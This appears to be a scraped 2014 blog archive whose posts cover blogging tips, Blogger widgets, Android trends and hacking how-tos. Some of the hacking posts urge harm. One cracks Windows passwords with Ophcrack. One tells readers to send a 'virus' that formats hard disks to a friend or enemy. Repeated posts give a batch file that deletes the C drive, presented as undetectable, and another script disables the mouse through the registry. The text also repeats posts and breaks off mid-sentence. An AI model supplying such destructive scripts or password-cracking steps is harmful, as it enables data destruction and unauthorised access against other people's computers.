Friday, October 31, 2014

How To Write The Perfect Guest Post That Is Never Rejected

writing perfect guest posts
As a blogger, you are constantly looking for more exposure. Writing guest posts for blogs is a great way to gain online reputation among the audience of your niche. However, with the Panda, Penguin and Hummingbird updates from Google, publishers are far more careful and particular about what they publish on their website. We recently posted onhow blog owners should deal with guest posts on their blogs, today we'll take a look at how writers can write effective guest posts that will never be rejected.

Even though some publishers no longer accept guest posts, many still do, but with a tougher acceptance criteria. So what really makes a guest post great? Today we share with you 5 tips on how to write the perfect guest post that never gets rejected.

1. Find the right publisher

best publisher for guest post
Firstly, as mentioned above, not all publishers accept guest posts. So you need to be certain of their stance towards guest posts before working on it.
Secondly, as tempting as it may be to submit your post directly to Mashable or TechCrunch, it would be very difficult to get yourself published there without building up your online reputation first. It would be like expecting a promotion on your first day at work. So do aim at getting published at these sites, but start with smaller sites with lower PR where you have better chances of getting published.

2. Be creative and factual

If you’re writing on a topic that has already been covered by hundreds of blogs online, multiple times, you’re not giving your audience anything interesting to read, nor are you giving the publishers a reason to consider you. Be creative with your choice of posts. Even if you produce low-quality content, don’t worry about it. It will gradually improve.
Keep in mind that when you’re writing on a certain topic, do your research and use facts for your argument. No one cares what your opinion is, they are interested in the facts. Use expert quotes, charts and research to build a sound argument for yourself that would convince the readers.

3. Know the Prerequisites for the Guest Post

prerequisites for guest post
Since you are writing for someone else, you need to follow their rules and regulations. Take a look at the blogs regulations to create content that matches their requirements. Do give special attention to the link exchange protocols they have established. You don’t want to give yourself a bad name by violating them and end up getting your article rejected as well. Add links that make sense at the location even a twitter account or a link to your blog’s homepage would do, but not a link to a random company page. It’s categorized as a bio.

4. Choose Trendy Topics

trendy topics
Know what’s up in the blogosphere. Keep track of what’s popular among your readers. Even if you are being creative with writing about something that used to be popular quite a while back or has a short term lifetime, you’re not helping yourself. Go for article that people read today and will continue to read in the days to come. It’s the easiest way to generate reliable long term traffic from a single blog post. 

5. Follow your readers

follow your readers
A good guest post always gathers comments from the readers. Follow them. Take their feedback. Sometimes they can give your valuable input that can eventually improve your writing and researching skills. Answer their questions, for it strengthens the bond between you and your readers. Interact with them and build a reputation for yourself among your target audience. 

If you follow these tips well enough, you can write the perfect guest post that will never be rejected. However, these skills come with time and practice, so if you’re a starter and had to face rejection from publishers, learn from your mistakes and work better the next time.

How To Improve Your Online Writing

online writing tips blogging
The most common mistake rookies make when starting online writing is thinking it’s the same as writing elsewhere. It’s very different and hence, requires a different methodology to be done effectively. Anyone can write a blog post, but not all know how to write a great blog post that makes the audience want to come back to the site. So what is the secret that makes great online writing great? Today we share 5 tips for improving your online writing skills.

1: Be Concise

be concise
Online writing is meant to be concise and short. If you read articles online, then you’ll know what we are talking about. Online readers mainly skim through an article and never go into the details. If you’re writing is too complicated, not only will your readers have a hard time trying to make sense of what you’re saying, they’ll move on to the next website that offers relevant information.

Keep your articles short, preferably below 500 words. This doesn’t apply to blog posts where you need to be elaborate enough to effectively communicate the subject. Write your article so that it delivers the information effectively in the minimum number of words possible.

2: Know your Domain

Generally your readers on the internet are hobbyists and have keen interest in the topic you are writing on. So when they are reading your work, they expect you to deliver something new to them. They expect you to be the expert. Now it’s up to you to deliver to them the quality they are expecting from you. Doing this will establish your name as an authentic and valuable source of information that they would turn to.

3: Take a Break

take a break
Writing is a time consuming task, and working for longer periods of time can eventually effect the quality of our work. It’s important that you give your mind a break every once in a while so that it can maintain its focus on the task at hand. Working for longer periods of time without any breaks can result in poorly written text that takes two or three sentences to say what can comfortably be explained in a single sentence.

4: Multimedia does wonders

multimedia in blogs
One of the benefits of writing online is the numerous tools at your disposal to communicate your point. Use anything that can help you in making your point, be it a graph, a video an illustration or sound clip. Secondly, it breaks up the article into chunks of text and media. This looks more appealing to the readers as compared to a page full of text.

5: Engage with your Audience

engage with audience
Online writing involves two way communication. You inform your readers and your readers give you their opinion on the subject. Encourage interaction with your audience. Asking for their opinion on the subject is the most common way to encourage comments.
Don’t be afraid of criticism, instead welcome it because every once in a while they can give you valuable tips to improve your writing or even point out flaws in your writing methodology. 

Developing your online writing skills takes a lot of time and patience. But even the most experienced writers can’t always get it right. Did you find these tips useful? Let us know in the comment section below.

Some Common Blogging Mistakes You Need To Avoid

blogging mistakes
Blogging is not for everyone! Just some other dude who knows good English can NOT be a good blogger. Blogging requires skill and experience. You need to know how and what to write on. Failing to write a proper post will not only disappoint your readers but will also reduce your page's ranking. Blogging sounds easy, but has some teeny tiny details you need to take care of to make it work. Let me introduce you to some of the very basic and common blogging mistakes every blogger must avoid.

Blogging is a profitable business from the commercial point of view provided done nicely and is literally a time waster otherwise. A blogger takes several complex things into account so as to make his blog work but ignores the most basic and important ones usually. While the important ones matter, the basics and fundamentals need not be ignored. Let's take a look at some of those mistakes and their solution.

1. Working without a goal

blogging mistakes without a goal
"A man without a goal is like a ship without a rudder", Thomas Carlyle. Ever asked yourself, Why am I blogging? There is a reason why blogging isn't meant for everybody. Before you start your own blog, you need to set up a proper goal and aim to achieve that from blogging. What you want could be money, popularity or just fun, but you need to answer this 'What'. You can never achieved an undetermined and unimaginable goal. Decide on why you'll start blogging and devise a proper plan to follow and strive hard to achieve it.

2. Ignoring SEO

blogging mistakes ignore SEO
The search engine robot is as important to you as your blog reader. Yes, you should write quality articles for the benefit of your readers but the hard truth is, you need to keep a good balance between both the search engine robot and your reader. Ignoring SEO is what is going to stagnate your blog progress. Unless if you're blogging for fun, SEO is THE most important step in blogging. There are several SEO techniques and tricks you can use to make your blog important and essential in the eyes of the search engine robot.

3. Bad post formatting

blogging mistakes bad formatting
With several running blogs, gaining reader's preference is a hard step especially if you don't care about the post formatting. Your blog post must be a hybrid of technical and informal writing so as to make it easy to understand and interpret for your reader. You should use proper highlighting techniques like using breaks, headings and sub-headings, bold face, proper font and shorter paragraphs to make your writing look neat and easy to interpret.

4. Using too much text in a single post

blogging mistakes too much text
Do you think your reader has all the time in the world to read your post? Don't know your answer but mine is NO. If someone told you putting tons of information in a single blog post of near-to-infinite length would be ideal to generate traffic, you were probably dreaming or that someone was playing with you. We've already covered the ideal post length topic, do take a look at it. The length to depth ratio of your blog post should be unity.

5. Bad posting times

blogging mistakes bad posting time
Ever wondered what the Schedule feature is on Blogger? Or do you just Publish? Well, you should decide a proper scheduling time for your post. Deciding that time might be hard in the start but will become easy for you once you start gaining readers. Try to find the peak times of traffic on your blogs and post on those times. Unless if yours' is a news blog, you should try to post at an appropriate time where you can get your writing to touch the most of the readers.

There are several other blogging mistakes that bloggers including me can commit. One fine way of analysing and determining the mistakes while blogging is to put yourself as the reader. Would you like to follow an improperly planned blog? Or read a poorly ranked blog? Or take a look at a poorly formatted post? Or read a 5000 word post? Or get to read articles posted at strange timings? NO, you won't want to do any of that. You'll also get the answer to several other answers this way which will help you identify the mistakes bloggers commit and their probable solutions.

How To Add Border Around Post Images On Blogger ?

Add Border Around Post Images On Blogger
Sometime you wish that there should be some style to your blog images like drop shadow or borders. In this simple tutorial i will teach you to add borders around your post images on blogger using few simple CSS Code. Lets do it!

Hot To Add Border Around Blog Images?

1. Go to Blogger > Template > Edit Html
2. Now search for ]]></b:skin> 
3. Copy/Paste the following code just above ]]></b:skin> 
.post img
     border:1px solid #e3e3e3;
     padding: 10px;
4. Save the template and you are done.
5. Make following changes to change style, color or size of the border.
  • Increase 1px to increase the width of border
  • change solid to dotted or dashed to change style of border
  • Replace #e3e3e3 to change border color
  • Remove border-radius: 10px; to remove the radius around the corners

Tips For Boosting Up Your Blog's Subscriber Base

blog subscribers
Many beginners tend to underestimate the importance of building a strong subscriber base for their blogs. A successful blog isn’t just well written and well-presented content, its maintaining a dedicated and passionate subscriber base who would read your content and spread it across their own networks. Engaged readers provide long term and reliable traffic to your blog. 

While there is no denying that building a loyal subscriber base can be a tricky and long process, it can be done with dedication and hard work by the bloggers. So those who do work on it need to do it right to make sure their time is well utilized. Today we take a look at 5 Tips to boost up your blog's subscriber base.

1. Give your readers a reason to subscribe

subscribe incentive
If someone visits your blog and sees a “Subscribe” button there, he/she should know exactly what they will get from subscribing to your blog. For example, if your blog is about Internet Marketing, you should have a text that says “covers all inbound marketing, SEO marketing and email marketing”. Giving your readers an incentive to subscribe is a plus that will push them to subscribe to your site. Everybody likes free stuff, so will your readers. Offer them an exclusive ebook or something relevant on a certain topic that was not covered in your posts in return for subscribing to the blog.

2. Simpler is better

simple website design
It’s a basic rule of web design that your website should lead the user to the desired action in less than three clicks. In this case, the subscription process can be made as simple as one-click. Soon enough you’ll figure out that there are many people out there who are unfamiliar with the concept of RSS Feeds. Try explaining to them how it works and how wonderful it is. Then, of course, there are readers who simply don’t prefer RSS. In that case provide them with an alternative, most commonly, an email subscription to your blog.

3. Produce Quality Content

While it may be obvious, but no matter how great your marketing and subscription strategies for your blogs are, your readers will never return to you if they are not satisfied with the content. Try to find peak traffic times for your blog and post on those times to touch the as many readers as possible. If posting on those times is a problem for you, schedule your posts to be published, schedule your posts to be published on the specified timings. Write frequently and write well. That is the key concept.

4. Leverage Social Proof

leverage social proof
People tend to follow the masses, its human nature. That remains true in case of blogging. You can make use of this to make people subscribe to your blog. While this scheme may not work particularly well for a newer blog, it can work handsomely for a blog with a decent number of subscribers. Display the number of subscribers your blog has next to the subscribe button. Not only does this boost their confident in your blog, but also pushes them to subscribe to a blog that is followed and trusted by many.

5. Use All Available Resources

social media
Use your existing blogs, website, social media profiles to convince audience to subscribe to the blog. If you already have a subscriber base elsewhere, you can easily convince them to subscribe to the blog since they already enjoy your content. They might even recommend your RSS feed to others. Add social media sharing buttons to the blog posts. If your readers enjoyed a post, they can share it with their Facebook/Twitter/LinkedIn networks and eventually some of them will end up subscribing to your blog. Let the readers do some work too.

Although there is a lot more you can do to help your blog gain more subscribers, these tips pretty much form the gist of them. So what have you done to increase the subscriber base of your blog? Let us know in the comment section below!

Add HTML5 Mp3 Music Player To Your Blog

Blogger html5 music player
Isn't it be cool to have a tune played when someone visit your websites or blog. Specially if your blog is about songs, music, movies and videos then it would be cool to play music automatically when visitors visits your websites. In this tutorial i will show you how to add a HTML5 mp3 music player to your blog. This mp3 player comes with features such as adjusting volume, play and pause button etc. It works on mostly all browsers except some lower version of internet explorer.

Live Demo (Check Below)

How to add HTML5 Mp3 Player ?

    1. Go to blogger Dashboard  > Layout
    2. Then Click on Add Gadget
    3. Select HTML/Javascript
    4. Copy the below code and Save it. (Any one of 3)

  • Code For Normal Mp3 Player
<audio controls="controls"><source src="" autoload="true" autoplay="true" hidden="true" type="audio/mp3" /></source></audio>

  • Code to play Automatically
<audio controls autoplay="controls"><source src="" autoload="true" autoplay="true" hidden="true" type="audio/mp3" /></source></audio>

  • Code to play music again and again (Looping)
<audio controls loop="controls"><source src="" autoload="true" autoplay="true" hidden="true" type="audio/mp3" /></source></audio>
    Note: Replace with url of mp3 file you want to play. The url     will end with  .mp3

    5. Now you have working  HTML5 Mp3 player on your blog.
    6. Place this widget where you want it to appear on your blog.

Popular Android Phone Trends for Cell Phone Watchers

Popular Android Phone Trends for Cell Phone Watchers
The launch of Samsung Galaxy S III, Android Jelly Bean, LG Nexus 4, HTC One X and a host of other smart phones has brought about revolutionary changes in the world of Android. Power packed with innumerable applications and features, these phones offer advanced and cutting edge technology for all users.
Even as cell phone watchers are being awed by their attractive designs, application downloading facilities, Linux based operating systems, global team of software professionals developers, performance profiling, debugging tools/plug-ins and a host of other personalized features; they are looking for more enhanced features and benchmarked performances in 2013.

So, what are the popular trends to look out?

Much Bigger Screens

android phone sizes
Android phones are now becoming synonymous with huge displays and larger screen sizes. With the high end 5.5-inch Samsung Galaxy Note II and 4.8-inch Samsung Galaxy S III making their presence felt with mammoth screens, larger display areas have created a big impact in the world of telecommunication and smart phones alike.

Happy times are in store for lovers with supersized smart phones models like Galaxy S IV with 4.99 inches of screen size and Galaxy Note III with 5.9 inches waiting to catch their attention. Following the footsteps of Samsung, other manufacturers are now extrapolating their screen sizes—in more ways than one.

Processors—Quad Core and Octa-Core

android samsung processors
Dual core processors are now passé. Cell phone watches are now being set for models which boast of quad core and octa core processors. These processors allow effective handling of more than one task at a given point of time and go a long way in improving overall performance. So, with quad core processors in hand, users are tapping into their other tasks along with watching their favorite movie on a small sized window on their display screen. .

While quad-core processors have already become a standard feature in most notable android phones, the first octa-core smart phone is all set to make its appearance at the end of 2013- in the Galaxy Note III.

TV Control

android phone tv controller
It’s a dream which may come true for many android users and television buffs. Cell watch circles are now buzzing with the news that future mobile sets are ready to boast of TV control features-- which will allow users to fling away their remote controls.
These smart applications will not require the purchase of set-top boxes or any software downloads. The HTC one already comes packaged with an IR emitter which has the abilities of manipulating volume, power, channels and almost every other essential feature of television sets. Android makers may soon follow suit to keep up with the competition.

Getting closer towards Indestructibility

You can expect more smart phones getting closer to indestructibility. With Sony’s flagship product Xperia Z offering waterproof features and Corning unveiling its Gorilla Glass 3, which is shatter proof beyond compare-- the going cannot get any better for users looking for almost indestructible products. Its certainly nice to have a phone which is more robust, durable and stronger than their other counterparts.

Hacking Window 7 Password Using Ophcrack

In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.
How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here.
  2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.
window7 password hacking
window7 password hacking

  5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.
Windows 7 Password hacking
Windows 7 Password hacking
  8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
  9. Copy this hash value which is under NT Hash field.
 10. Navigate to which is an online hash cracking tool.
 11. Type in the hash value you copied down in Step 9, Enter the captche and click on Crack Hashes.

Create Binary Virus To Format Hard Disk

Create Binary Virus to Format Hard Disk

Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

How To Create Virus To Format Hard Drive ?

   1. Copy the below codes into Notepad.
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

If for some reason this does not work for you then check out below tutorial

Learn To Make Dangerous Virus To Format Hard Drive

Learn To Make Dangerous Virus In A Minute

computer virus
In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to

Make A Virus That Disable Mouse

Make A Virus That Disable Mouse

I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

Block Facebook On Your Computer In Few Simple Steps

facebook blocker

I had previously posted about Blocking Facebook on your computer but many users were facing difficulties doing that. So In this tutorial i will share with you guys an amazing programme or small little tool that will allow you block facebook on your computer easily in just few simple steps. So lets get started
How To Use Facebook Blocker ?

 1. First download Facebook Blocker by Clicking Here
  2. Extract the file and right click on Facebook Blocker.exe and run it as administator (Important)
  3. Press 1 in order to  backup your host file to be on the safe side.
facebook blocker
  4. Now Press 2 to block facebook
  5. Its time to check if facebook is blocked or not to do that Press 5
  6. Hope this help you if you have any question leave a comment below.

Learn To Make Dangerous Virus In A Minute

computer virus
In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Hacking  Someone's Facebook Password Using Some Software Or Website? No Sir You Can't!

facebook hacking
Do you know there are over thousands of websites and software that claim to hack facebook password  of any account? They'd ask you the victim's profile ID, maybe your credentials and some money too and will reportedly tell you the password which, to be honest, never works. Ever wonder why? Let me tell you why, they're FAKE! They're a scam which tricks you somehow in losing your money or your own Facebook account. Just give it a thought, why would Zuckerberg and his team spend Billions of Dollars on Facebook if one could hack it in less than a minute? Today, we'll take a look at this topic in detail with some example websites and software and get answers to some common related questions.

Back in 2005, I came across a mechanism that reportedly hacked Yahoo mail password for a user using some simple tricks. It didn't work for me for obvious reasons but I didn't stop believing the possibility until I grew up to realize how helpless I am here. One of the major concerns of large organizations like Facebook and Yahoo is security because of the super sensitive information about people they have. Several hundred million dollars are spend yearly by these organizations to ensure security and then there's these websites that claim to undo all that protection in less than a minute.

The Facebook password cracking Websites and Software

Let's start with some examples here. I googled the subject and picked the top results without order. Didn't care to search harder because there are thousands such and I know that all are FAKE.

So let's look at this
hacking facebook password
Their  free facebook hacker program is said to be capable of cracking the password of any Facebook user within a day. Sounds cool, I could try it out, but my Norton Antivirus rejected the file straight away.

I also picked up another one. This Hack-Fbook-Password asks me to enter the profile ID of a user and it will crack the password. I said Okay and began the process.
facebook hacking
It ran certain algorithms to determine the password and finally landed me on a page that said I could DOWNLOAD the password IF I fill an online survey first. Those of you who've been redirected to surveys would know they don't work and are put just so to get traffic and earn money.

I said maybe I should leave the website now but hey, they gave me a prize!
hacking facebook

So I just became the luckiest person in my city just like that!

Now tell me, how can a sane person believe in all this?

The truth!

Let me get this straight to you, these websites do nothing at all just waste your time and are never able to do the job. In fact, downloaded programs just make the situation worse when you run them. I had my Norton Antivirus to guard me otherwise I could be in severe danger currently.

These software are mostly keyloggers and tracking programs that record your keystrokes and action and steal personal information from your computer in the background and send it to their master servers. So ultimately a hacker wannabe gets hacked, how ironic!

From now on in the post, I'll be using the word 'Hacker' for these websites and software since you're no more in the position to be called that.

Why do these 'Hackers' do all that?

facebook hack
Setting up websites, maintaining them and developing software is not an easy task. It requires some money. So why do these 'hackers' do all the hassle? It's because they get equivalent or more money in return. They can extract your credit card detail and other banking info from your systemand use it for their advantage. They can hack your account and use it for wrong purposes. Give me one reason why one wouldn't steal money and hack accounts for no loss.

Why people fall in their webs?

facebook hack
Why do people try to use such unreal hacking procedures? It's because it's unreal to me, it's unreal to you but not to those who are not much familiar with the working of a software. They get in the web of these hackers and eventually get screwed up pretty bad without consent.

The websites give guarantees and also portray their 'imaginary' happy customers so as to trick a reader. Such tactics are simple but really powerful and serves to their advantage in most cases. This is also why there are thousands of such websites available.

So is Facebook account an 'unbreakable fortress'?

facebook hacking
Well, NO. Facebook accounts can be hacked. No online service is foolproof and that is because of the flaws and bugs in their software. There are several ACTUAL hackers in the world who can analyse a website's security and use that against it thus making hacking a reality.

But I'm 100% sure none of them uses these scam and fake websites that claim to do the impossible. You can check out our hacking section to know more.

How To Use Google As Proxy

google proxy server
We often use schools and colleges internet connections, but they usually block access to undesired web sites (the "black list"). In order to access those sites you can do is use google translate as  proxy to bypass this restrictions. So lets get into it.

Method 1

1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type  in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2

1. Go to link given below:|en&
2. Change to website you like to visit.
3. Done!

If you use this trick, you are not sure to protect your privacy, this kind of connection lets you see blacklisted or banned pages but does not hide your IP address.

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